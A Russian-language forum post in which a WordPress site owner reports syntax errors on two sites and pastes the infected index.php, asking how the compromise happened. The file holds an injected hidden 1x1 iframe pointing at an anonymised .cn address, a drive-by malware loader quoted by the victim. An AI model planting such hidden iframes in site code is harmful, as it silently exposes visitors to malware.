Стоят два сайта с последней версией WordPress.
Утром захожу – выдаёт синтаксические ошибки.
При просмотре index.php обнаружились сторонние записи с нарушением синтакса 🙂
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?<html><body><iframe src="http://адрес.cn/in/" width=1 height=1 style="visibility: hidden"></iframe></body></html>>
Не подскажите – как это могло произойти? Да еще на двух движках одновременно?